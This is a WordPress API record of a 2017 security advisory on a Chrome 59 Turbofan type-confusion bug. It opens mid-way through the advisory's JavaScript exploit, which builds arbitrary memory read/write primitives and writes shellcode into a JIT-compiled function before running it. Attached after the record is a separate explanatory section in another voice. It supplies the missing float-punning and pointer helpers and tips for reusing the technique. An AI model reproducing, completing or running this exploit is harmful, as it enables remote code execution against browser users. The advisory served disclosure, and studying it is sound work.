class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">fake_arraybuffer <\/span><span class=\"crayon-r\">instanceof<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ArrayBuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-135\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-136\"><span class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">DataView<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fake_arraybuffer<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-137\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-138\"><span class=\"crayon-c\">\/******************************* step 5 Read a Function Address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-139\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-140\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">func_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;eval('');&quot;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-141\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-142\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">function_to_shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;a&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_body<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-144\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">function_to_shellcode<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-145\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-146\"><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x38<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-147\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-148\"><span class=\"crayon-c\">\/**************************************&nbsp;&nbsp;And now, we get arbitrary memory read write!!!!!!&nbsp;&nbsp; 
******************************************\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-149\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-150\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-151\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-152\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getUint32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-153\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-154\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Write32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-155\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-156\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;w&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-157\"><span class=\"crayon-h\">\t\t<\/span><span 
class=\"crayon-v\">fake_dv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setUint32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-158\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-159\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">shellcode_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Read32<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">shellcode_address_ref<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-160\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-161\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">shellcode_address<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-162\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-163\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fake_ab_float<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/ 0x100000000,addr &amp; 0xffffffff);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-164\"><span class=\"crayon-c\">\tfor(var i = 0; i &lt; shellcode.length;i++){<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-165\"><span class=\"crayon-c\">\t\tvar value = shellcode[i];\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-166\"><span class=\"crayon-c\">\t\tfake_dv.setUint32(i * 4,value,true);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-167\"><span class=\"crayon-c\">\t}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-168\"><span class=\"crayon-c\">\talert(&quot;boom&quot;);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-169\"><span class=\"crayon-c\">\tfunction_to_shellcode();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-170\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-172\"><span 
class=\"crayon-c\">&lt;\/s<\/span><span class=\"crayon-v\">cript<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3379\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/Chrome-RCE-300x209.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 16 Aug 2017 07:21:39 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a type confusion vulnerability that leads to remote code execution found in Chrome browser version 59. Chrome browser is affected by a type confusion vulnerability. 
The vulnerability results from incorrect optimization by the turbofan compiler, which causes confusion between access to an object array and a value array, and &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3379\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome Turbofan Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,12136],"class_list":["post-8775","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8775"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8775\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8775"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]
}}
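The final steps of the advisory's exploit (Read32/Write32 through the fake DataView, the `shellcode_address_ref = u2d(e4()) + 0x38 - 1` computation, and the little-endian reassembly `Read32(ref) + Read32(ref + 4) * 0x100000000`) rest on helpers and conventions the listing does not spell out. The block below is an added example, not code from the advisory or its author. The names `d2u` and `u2d` are taken from the listing; their bodies are the conventional typed-array punning implementation and are an assumption, as are the simulated memory image, its base address and the sample pointer value. `read32`/`write32` here are offline stand-ins for the page's Read32/Write32 so the address arithmetic can be exercised without the bug.

```javascript
// Added example (not from the advisory). Shows the float<->integer punning
// helpers, the 64-bit address split/join used by Read32/Write32, and the V8
// pointer untagging behind the `- 1`. Runs as-is in Node or a browser console.

// One 8-byte buffer viewed as a double and as two uint32 words. A little-endian
// host (x86/x64) is assumed, so punU32[0] is the low half of the double.
const punBuf = new ArrayBuffer(8);
const punF64 = new Float64Array(punBuf);
const punU32 = new Uint32Array(punBuf);

// d2u(hi, lo): the double whose bit pattern is (hi << 32) | lo. Storing it into
// a double-elements array plants a raw 64-bit value in the backing store, which
// is how the exploit overwrites the fake ArrayBuffer's backing-store pointer.
function d2u(hi, lo) {
  // Uint32Array assignment applies ToUint32: a fractional hi (addr / 0x100000000)
  // is truncated, and a negative lo (addr & 0xffffffff yields a signed int32
  // when bit 31 is set) wraps to the intended unsigned word.
  punU32[1] = hi;
  punU32[0] = lo;
  return punF64[0];
}

// u2d(d): the inverse, reading a double's bits back as an integer Number.
// Exact below 2^53, which covers every user-space pointer on x64 (47 bits).
function u2d(d) {
  punF64[0] = d;
  return punU32[1] * 0x100000000 + punU32[0];
}

// Split an address into the (hi, lo) pair d2u expects, as the exploit does
// inline. The explicit >>> 0 makes the unsigned low word visible instead of
// relying on the typed array's coercion.
function splitAddr(addr) {
  return { hi: Math.floor(addr / 0x100000000), lo: addr >>> 0 };
}

// Little-endian join, as in Read32(ref) + Read32(ref + 4) * 0x100000000.
function joinAddr(lo, hi) {
  return lo + hi * 0x100000000;
}

// V8 marks heap-object pointers by setting the low bit (Smis have it clear).
// Subtracting 1 recovers the raw address: the `- 1` in shellcode_address_ref.
function untag(taggedPtr) {
  return taggedPtr - 1;
}

// Constructed stand-in for process memory: a 0x100-byte image "mapped" at
// BASE (assumed value). The page's Read32/Write32 perform the same 32-bit
// little-endian accesses through a DataView whose backing-store pointer
// they first redirect with d2u.
const BASE = 0x7f1200000000;
const image = new DataView(new ArrayBuffer(0x100));
function read32(addr) { return image.getUint32(addr - BASE, true); }
function write32(addr, value) { image.setUint32(addr - BASE, value, true); }

// Read a 64-bit pointer stored at addr, as the exploit reads shellcode_address.
function readPtr(addr) {
  return joinAddr(read32(addr), read32(addr + 4));
}

// Copy an array of 32-bit words to addr, as the exploit's shellcode loop does.
function writeWords(addr, words) {
  for (let i = 0; i < words.length; i++) write32(addr + i * 4, words[i]);
}

// Worked values (constructed): a pointer whose low word has bit 31 set, so the
// signed-int32 behaviour of & is exercised. Stored little-endian at BASE + 0x40.
const target = 0x7f12deadbee0;
const { hi, lo } = splitAddr(target);
write32(BASE + 0x40, lo);
write32(BASE + 0x44, hi);
```

Two points worth keeping in mind when reusing this pattern. `target & 0xffffffff` evaluates to a negative int32 (-559038752 for the sample pointer), and the exploit only gets away with it because the Uint32Array store wraps it; the same expression fed to code that expects a non-negative Number would misbehave. And because user-space addresses occupy at most 48 bits, every double `d2u` produces for a pointer is a small denormal, never a NaN; that matters because V8 canonicalizes NaNs when storing them into a double-elements array, so a planted 64-bit value whose top exponent bits were all ones would not survive the store.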